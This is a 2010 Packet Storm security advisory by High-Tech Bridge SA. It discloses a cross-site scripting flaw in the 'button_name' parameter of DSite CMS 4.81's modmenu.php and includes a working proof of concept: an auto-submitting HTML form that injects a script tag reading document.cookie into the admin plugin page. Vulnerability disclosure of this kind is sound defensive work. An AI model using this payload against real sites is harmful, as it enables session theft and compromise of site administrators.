DSite CMS 4.81 Cross Site Scripting

2010-07-16T00:00:00
ID PACKETSTORM:91855
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2010-07-16T00:00:00

Description

                                        
                                            `Vulnerability ID: HTB22465  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_dsite_cms.html  
Product: DSite CMS  
Vendor: Media Programming Group ( http://www.dsite.ru )   
Vulnerable Version: 4.81 and Probably Prior Versions  
Vendor Notification: 01 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "modmenu.php" script to properly sanitize user-supplied input in "button_name" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/admin/plugin.php?menu_id=1&module=menu&plitem=modmenu.php" method="post" name="main" >  
<input type="hidden" name="module" value="menu" />  
<input type="hidden" name="plitem" value="modmenu.php" />  
<input type="hidden" name="menu_id" value="1" />  
<input type="hidden" name="button_name" value='bn"><script>alert(document.cookie)</script>' />  
<input type="hidden" name="new_make" value="YES" />  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
`